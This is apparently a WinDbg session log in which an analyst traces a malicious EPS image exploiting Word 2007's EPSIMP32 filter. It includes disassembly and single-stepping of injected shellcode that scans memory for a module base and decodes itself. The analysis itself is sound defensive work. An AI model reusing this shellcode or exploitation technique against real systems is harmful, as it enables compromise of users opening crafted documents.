ModLoad: 73f50000 73f63000   C:\Windows\system32\dwmapi.dll
ModLoad: 710d0000 710e2000   C:\Windows\system32\MPR.dll
ModLoad: 77720000 7779b000   C:\Windows\system32\COMDLG32.dll
ModLoad: 76430000 7644f000   C:\Windows\system32\IMM32.dll
ModLoad: 75b70000 75c3c000   C:\Windows\system32\MSCTF.dll
ModLoad: 76090000 760c5000   C:\Windows\system32\WS2_32.dll
ModLoad: 76230000 76236000   C:\Windows\system32\NSI.dll
ModLoad: 6ded0000 6e110000   C:\Windows\system32\msi.dll
ModLoad: 64020000 65168000   C:\Program Files\Microsoft Office\Office12\wwlib.dll
ModLoad: 66e80000 67de8000   C:\Program Files\Microsoft Office\Office12\oart.dll
ModLoad: 685a0000 69627000   C:\Program Files\Common Files\Microsoft Shared\office12\mso.dll
ModLoad: 6c920000 6c9f7000   C:\Program Files\Microsoft Office\Office12\1033\wwintl.dll
ModLoad: 74330000 74370000   C:\Windows\system32\uxtheme.dll
ModLoad: 744e0000 7467e000   C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\Comctl32.dll
ModLoad: 62f90000 635e5000   C:\Program Files\Common Files\Microsoft Shared\OFFICE12\MSORES.DLL
ModLoad: 6c560000 6c61a000   C:\Program Files\Common Files\Microsoft Shared\OFFICE12\MSPTLS.DLL
ModLoad: 6fc30000 6fc47000   C:\Windows\system32\DavClnt.DLL
ModLoad: 6fae0000 6fae8000   C:\Windows\system32\DAVHLPR.dll
ModLoad: 5e420000 5edfd000   C:\Program Files\Common Files\Microsoft Shared\office12\1033\MSOINTL.DLL
ModLoad: 6d2e0000 6d32a000   C:\Windows\system32\mscoree.dll
ModLoad: 6ca00000 6ca7d000   C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
ModLoad: 74a50000 74a59000   C:\Windows\system32\VERSION.dll
ModLoad: 75600000 7560c000   C:\Windows\system32\CRYPTBASE.dll
ModLoad: 6fff0000 70041000   C:\Windows\system32\Winspool.DRV
ModLoad: 6cb20000 6cbda000   C:\Windows\system32\spool\DRIVERS\W32X86\3\unidrvui.dll
ModLoad: 6c520000 6c558000   C:\Windows\system32\spool\DRIVERS\W32X86\3\mxdwdui.DLL
ModLoad: 76670000 766f3000   C:\Windows\system32\CLBCatQ.DLL
ModLoad: 683c0000 684c5000   C:\Program Files\Common Files\Microsoft Shared\office12\riched20.dll
ModLoad: 743a0000 74495000   C:\Windows\system32\propsys.dll
ModLoad: 73d00000 73d21000   C:\Windows\system32\ntmarta.dll
ModLoad: 75ca0000 75ce5000   C:\Windows\system32\WLDAP32.dll
ModLoad: 6a1a0000 6a2f5000   C:\Program Files\Common Files\Microsoft Shared\OFFICE11\msxml5.dll
ModLoad: 751d0000 751e7000   C:\Windows\system32\CRYPTSP.dll
ModLoad: 74eb0000 74eeb000   C:\Windows\system32\rsaenh.dll
ModLoad: 75670000 7567e000   C:\Windows\system32\RpcRtRemote.dll
ModLoad: 75610000 7566f000   C:\Windows\system32\SXS.DLL
ModLoad: 6c460000 6c517000   C:\Program Files\Microsoft Office\Office12\msproof6.dll
ModLoad: 68050000 680d7000   C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCP80.dll
ModLoad: 3f100000 3f401000   C:\Program Files\Common Files\Microsoft Shared\PROOF\1033\MSGR3EN.DLL
ModLoad: 66db0000 66e71000   C:\Windows\system32\spool\DRIVERS\W32X86\3\mxdwdrv.dll
ModLoad: 6e7b0000 6e7c4000   C:\Windows\system32\FontSub.dll
(cd0.a04): Break instruction exception - code 80000003 (first chance)
eax=7ffd4000 ebx=00000000 ecx=00000000 edx=7760f125 esi=00000000 edi=00000000
eip=775a40f0 esp=04b4f78c ebp=04b4f7b8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!DbgBreakPoint:
775a40f0 cc              int     3
0:010> ba r4 ZwProtectVirtualMemory
0:010> g
(cd0.e50): Unknown exception - code e0000002 (first chance)
(cd0.e50): Unknown exception - code e0000002 (first chance)
ModLoad: 62e00000 62f8b000   C:\Program Files\Common Files\Microsoft Shared\OFFICE12\OGL.DLL
ModLoad: 73e00000 73e0d000   C:\Windows\system32\WTSAPI32.DLL
ModLoad: 75690000 756b9000   C:\Windows\system32\WINSTA.dll
ModLoad: 6fad0000 6fad9000   C:\Windows\system32\LINKINFO.dll
ModLoad: 6e8a0000 6e910000   C:\Windows\system32\ntshrui.dll
ModLoad: 75330000 75349000   C:\Windows\system32\srvcli.dll
ModLoad: 6e940000 6e94b000   C:\Windows\system32\cscapi.dll
ModLoad: 73900000 7390a000   C:\Windows\system32\slc.dll
ModLoad: 63bb0000 63c1f000   C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\EPSIMP32.FLT
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\EPSIMP32.FLT - 
Breakpoint 0 hit
eax=000000b8 ebx=04371f01 ecx=775b5f18 edx=00000000 esi=00000000 edi=0011ea78
eip=63bed2a0 esp=002bc7a0 ebp=002bc7dc iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3e:
63bed2a0 8975d4          mov     dword ptr [ebp-2Ch],esi ss:0023:002bc7b0=00000000
0:000> ub eip
EPSIMP32!RegisterPercentCallback+0x15c23:
63bed285 3b482c          cmp     ecx,dword ptr [eax+2Ch]
63bed288 7d21            jge     EPSIMP32!RegisterPercentCallback+0x15c49 (63bed2ab)
63bed28a 8b5024          mov     edx,dword ptr [eax+24h]
63bed28d 8b12            mov     edx,dword ptr [edx]
63bed28f 8b5220          mov     edx,dword ptr [edx+20h]
63bed292 035028          add     edx,dword ptr [eax+28h]
63bed295 c745d003000000  mov     dword ptr [ebp-30h],3
63bed29c 0fb6040a        movzx   eax,byte ptr [edx+ecx]
0:000> bc 0
0:000> bp 63bed29c "u edx+ecx;r;g;"
0:000> bp ntdll!NtCreateEvent+0x5 ".if(eax == 0x45){g;}"
0:000> g
ntdll!ZwProtectVirtualMemory+0x3:
775b5f1b 0000            add     byte ptr [eax],al
775b5f1d ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f22 ff12            call    dword ptr [edx]
775b5f24 c21400          ret     14h
775b5f27 90              nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000      mov     eax,0D8h
775b5f2d ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f32 ff12            call    dword ptr [edx]
eax=043720b0 ebx=04371f01 ecx=775b5f1b edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc718 ebp=002bc754 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a        movzx   eax,byte ptr [edx+ecx]     ds:0023:775b5f1b=00
ntdll!ZwProtectVirtualMemory+0x4:
775b5f1c 00ba0003fe7f    add     byte ptr SharedUserData!SystemCallStub (7ffe0300)[edx],bh
775b5f22 ff12            call    dword ptr [edx]
775b5f24 c21400          ret     14h
775b5f27 90              nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000      mov     eax,0D8h
775b5f2d ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f32 ff12            call    dword ptr [edx]
775b5f34 c20800          ret     8
eax=043720b0 ebx=04371f01 ecx=775b5f1c edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc6a4 ebp=002bc6e0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a        movzx   eax,byte ptr [edx+ecx]     ds:0023:775b5f1c=00
ntdll!ZwProtectVirtualMemory+0x1:
775b5f19 d7              xlat    byte ptr [ebx]
775b5f1a 0000            add     byte ptr [eax],al
775b5f1c 00ba0003fe7f    add     byte ptr SharedUserData!SystemCallStub (7ffe0300)[edx],bh
775b5f22 ff12            call    dword ptr [edx]
775b5f24 c21400          ret     14h
775b5f27 90              nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000      mov     eax,0D8h
775b5f2d ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
eax=043720b0 ebx=04371f01 ecx=775b5f19 edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc5f0 ebp=002bc62c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a        movzx   eax,byte ptr [edx+ecx]     ds:0023:775b5f19=d7
ntdll!ZwProtectVirtualMemory+0x2:
775b5f1a 0000            add     byte ptr [eax],al
775b5f1c 00ba0003fe7f    add     byte ptr SharedUserData!SystemCallStub (7ffe0300)[edx],bh
775b5f22 ff12            call    dword ptr [edx]
775b5f24 c21400          ret     14h
775b5f27 90              nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000      mov     eax,0D8h
775b5f2d ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f32 ff12            call    dword ptr [edx]
eax=043720b0 ebx=04371f01 ecx=775b5f1a edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc5f0 ebp=002bc62c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a        movzx   eax,byte ptr [edx+ecx]     ds:0023:775b5f1a=00
ntdll!ZwProtectVirtualMemory+0x3:
775b5f1b 0000            add     byte ptr [eax],al
775b5f1d ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f22 ff12            call    dword ptr [edx]
775b5f24 c21400          ret     14h
775b5f27 90              nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000      mov     eax,0D8h
775b5f2d ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f32 ff12            call    dword ptr [edx]
eax=043720b0 ebx=04371f01 ecx=775b5f1b edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc5f0 ebp=002bc62c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a        movzx   eax,byte ptr [edx+ecx]     ds:0023:775b5f1b=00
ntdll!ZwProtectVirtualMemory+0x4:
775b5f1c 00ba0003fe7f    add     byte ptr SharedUserData!SystemCallStub (7ffe0300)[edx],bh
775b5f22 ff12            call    dword ptr [edx]
775b5f24 c21400          ret     14h
775b5f27 90              nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000      mov     eax,0D8h
775b5f2d ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f32 ff12            call    dword ptr [edx]
775b5f34 c20800          ret     8
eax=043720b0 ebx=04371f01 ecx=775b5f1c edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc5f0 ebp=002bc62c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a        movzx   eax,byte ptr [edx+ecx]     ds:0023:775b5f1c=00
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=000000d7 ebx=04371fa0 ecx=061e0f08 edx=0011f5c8 esi=0011ea78 edi=00000000
eip=775b55ad esp=061e0f62 ebp=002bc870 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
ntdll!ZwCreateEvent+0x5:
775b55ad ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
0:000> dd esp
061e0f62  061e2f08 ffffffff 061e0108 061e010c
061e0f72  00000040 061e0110 00000000 00000000
061e0f82  00000000 00000000 00000000 00000000
061e0f92  00000000 00000000 00000000 00000000
061e0fa2  00000000 00000000 00000000 00000000
061e0fb2  00000000 00000000 00000000 00000000
061e0fc2  00000000 00000000 00000000 00000000
061e0fd2  00000000 00000000 00000000 00000000
0:000> g poi(esp)
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=00000000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f08 esp=061e0f7a ebp=002bc870 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
061e2f08 60              pushad
0:000> uf eip
Flow analysis was incomplete, some code may be missing
061e2f08 60              pushad
061e2f09 64a100000000    mov     eax,dword ptr fs:[00000000h]
061e2f0f 8b4004          mov     eax,dword ptr [eax+4]
061e2f12 250000ffff      and     eax,0FFFF0000h

061e2f17 6681384d5a      cmp     word ptr [eax],5A4Dh
061e2f1c 7517            jne     061e2f35  Branch

061e2f1e 81783c00020000  cmp     dword ptr [eax+3Ch],200h
061e2f25 730e            jae     061e2f35  Branch

061e2f27 8b503c          mov     edx,dword ptr [eax+3Ch]
061e2f2a 03d0            add     edx,eax
061e2f2c 66813a5045      cmp     word ptr [edx],4550h
061e2f31 7502            jne     061e2f35  Branch

061e2f33 eb07            jmp     061e2f3c  Branch

061e2f35 2d00000100      sub     eax,10000h
061e2f3a ebdb            jmp     061e2f17  Branch

061e2f3c 8b7a1c          mov     edi,dword ptr [edx+1Ch]
061e2f3f 8b722c          mov     esi,dword ptr [edx+2Ch]
061e2f42 03f0            add     esi,eax
061e2f44 03fe            add     edi,esi

061e2f46 83ed04          sub     ebp,4
061e2f49 8b4d00          mov     ecx,dword ptr [ebp]
061e2f4c 3bce            cmp     ecx,esi
061e2f4e 7218            jb      061e2f68  Branch

061e2f50 3bcf            cmp     ecx,edi
061e2f52 7314            jae     061e2f68  Branch

061e2f54 8079fdff        cmp     byte ptr [ecx-3],0FFh
061e2f58 750e            jne     061e2f68  Branch

061e2f5a 8079fe50        cmp     byte ptr [ecx-2],50h
061e2f5e 7508            jne     061e2f68  Branch

061e2f60 8079ff10        cmp     byte ptr [ecx-1],10h
061e2f64 7502            jne     061e2f68  Branch

061e2f66 eb02            jmp     061e2f6a  Branch

061e2f68 ebdc            jmp     061e2f46  Branch

061e2f6a 896c2418        mov     dword ptr [esp+18h],ebp
061e2f6e 61              popad
061e2f6f 87e1            xchg    esp,ecx
061e2f71 60              pushad
061e2f72 8bec            mov     ebp,esp
061e2f74 e800000000      call    061e2f79
061e2f79 8b3424          mov     esi,dword ptr [esp]
061e2f7c 8d642404        lea     esp,[esp+4]
061e2f80 81ee71000000    sub     esi,71h
061e2f86 81c6a0000000    add     esi,0A0h
061e2f8c 68dc000000      push    0DCh
061e2f91 59              pop     ecx
061e2f92 8d3c8e          lea     edi,[esi+ecx*4]
061e2f95 6a1f            push    1Fh
061e2f97 58              pop     eax
061e2f98 d12f            shr     dword ptr [edi],1
061e2f9a d116            rcl     dword ptr [esi],1
061e2f9c 83c604          add     esi,4
061e2f9f 48              dec     eax
061e2fa0 7506            jne     061e2fa8  Branch

061e2fa2 6a1f            push    1Fh
061e2fa4 58              pop     eax
061e2fa5 83c704          add     edi,4

061e2fa8 7177            jno     061e3021  Branch

061e2faa b245            mov     dl,45h
061e2fac 2c98            sub     al,98h
061e2fae c52d86c52d0e    lds     ebp,fword ptr ds:[0E2DC586h]
061e2fb4 c529            lds     ebp,fword ptr [ecx]
061e2fb6 844521          test    byte ptr [ebp+21h],al
061e2fb9 90              nop
061e2fba c50d409c3600    lds     ecx,fword ptr ds:[369C40h]
061e2fc0 3980ba04403c    cmp     dword ptr [eax+3C4004BAh],eax
061e2fc6 023b            add     bh,byte ptr [ebx]
061e2fc8 803100          xor     byte ptr [ecx],0
061e2fcb 3a88409c2680    cmp     cl,byte ptr [eax-7FD963C0h]
061e2fd1 29803aef403c    sub     dword ptr [eax+3C40EF3Ah],eax
061e2fd7 022b            add     ch,byte ptr [ebx]
061e2fd9 802100          and     byte ptr [ecx],0
061e2fdc 3a6b29          cmp     ch,byte ptr [ebx+29h]
061e2fdf 7428            je      061e3009  Branch

061e2fe0 2800            sub     byte ptr [eax],al

061e2fe1 0000            add     byte ptr [eax],al
061e2fe3 00c5            add     ch,al

061e2fee 292b            sub     dword ptr [ebx],ebp
061e2ff0 2b740000        sub     esi,dword ptr [eax+eax]
061e2ff4 0080451e92c1    add     byte ptr [eax-3E6DE1BBh],al
061e2ffa e301            jecxz   061e2ffd  Branch

061e2ffc c1737e5c        sal     dword ptr [ebx+7Eh],5Ch

061e2ffd 737e            jae     061e307d  Branch

061e2fff 5c              pop     esp

061e3000 aa              stos    byte ptr es:[edi]
061e3001 aa              stos    byte ptr es:[edi]
061e3002 aa              stos    byte ptr es:[edi]
061e3003 2afe            sub     bh,dh
061e3005 99              cdq
061e3006 e424            in      al,24h
061e3008 f9              stc

061e3009 d7              xlat    byte ptr [ebx]
061e300a c01f33          rcr     byte ptr [edi],33h
061e300d 3333            xor     esi,dword ptr [ebx]
061e300f 333a            xor     edi,dword ptr [edx]
061e3011 fb              sti

061e3012 c16382c4        shl     dword ptr [ebx-7Eh],0C4h
061e3016 3e7ef9          ht jle  061e3012  Branch

061e3019 d7              xlat    byte ptr [ebx]
061e301a c01f33          rcr     byte ptr [edi],33h
061e301d 3333            xor     esi,dword ptr [ebx]
061e301f 333a            xor     edi,dword ptr [edx]

061e3021 fb              sti
061e3022 c17782c4        sal     dword ptr [edi-7Eh],0C4h
061e3026 3e7cc5          ht jl   061e2fee  Branch

061e3029 22fe            and     bh,dh
061e302b 45              inc     ebp
061e302c 2afc            sub     bh,ah
061e302e 15682fafad      adc     eax,0ADAF2F68h
061e3033 64e1aa          loope   061e2fe0  Branch

061e3036 45              inc     ebp
061e3037 7640            jbe     061e3079  Branch

061e3039 62627f          bound   esp,qword ptr [edx+7Fh]

061e3079 008023323a28    add     byte ptr [eax+283A3223h],al

061e307d 3a28            cmp     ch,byte ptr [eax]

061e307f 39b7b1203232    cmp     dword ptr [edi+323220B1h],esi
061e3085 b9b2393980      mov     ecx,803939B2h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=00000000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f09 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
061e2f09 64a100000000    mov     eax,dword ptr fs:[00000000h] fs:003b:00000000=002bc95c

mem-eax-001

0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=002bc95c ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f0f esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
061e2f0f 8b4004          mov     eax,dword ptr [eax+4] ds:0023:002bc960=63c102c8
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c102c8 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f12 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
061e2f12 250000ffff      and     eax,0FFFF0000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c10000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f17 6681384d5a      cmp     word ptr [eax],5A4Dh     ds:0023:63c10000=8bff
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c10000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0         ov up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000a06
061e2f1c 7517            jne     061e2f35                                [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c10000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0         ov up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000a06
061e2f35 2d00000100      sub     eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c00000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f3a ebdb            jmp     061e2f17
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c00000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f17 6681384d5a      cmp     word ptr [eax],5A4Dh     ds:0023:63c00000=c63b
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c00000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0         ov up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000a16
061e2f1c 7517            jne     061e2f35                                [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c00000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0         ov up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000a16
061e2f35 2d00000100      sub     eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bf0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f3a ebdb            jmp     061e2f17
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bf0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f17 6681384d5a      cmp     word ptr [eax],5A4Dh     ds:0023:63bf0000=0fc0
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bf0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000293
061e2f1c 7517            jne     061e2f35                                [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bf0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000293
061e2f35 2d00000100      sub     eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63be0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f3a ebdb            jmp     061e2f17
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63be0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f17 6681384d5a      cmp     word ptr [eax],5A4Dh     ds:0023:63be0000=75ff
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63be0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f1c 7517            jne     061e2f35                                [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63be0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f35 2d00000100      sub     eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bd0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f3a ebdb            jmp     061e2f17
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bd0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f17 6681384d5a      cmp     word ptr [eax],5A4Dh     ds:0023:63bd0000=458d
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bd0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0         nv up ei ng nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000283
061e2f1c 7517            jne     061e2f35                                [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bd0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei ng nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000283
061e2f35 2d00000100      sub     eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bc0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f3a ebdb            jmp     061e2f17
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bc0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
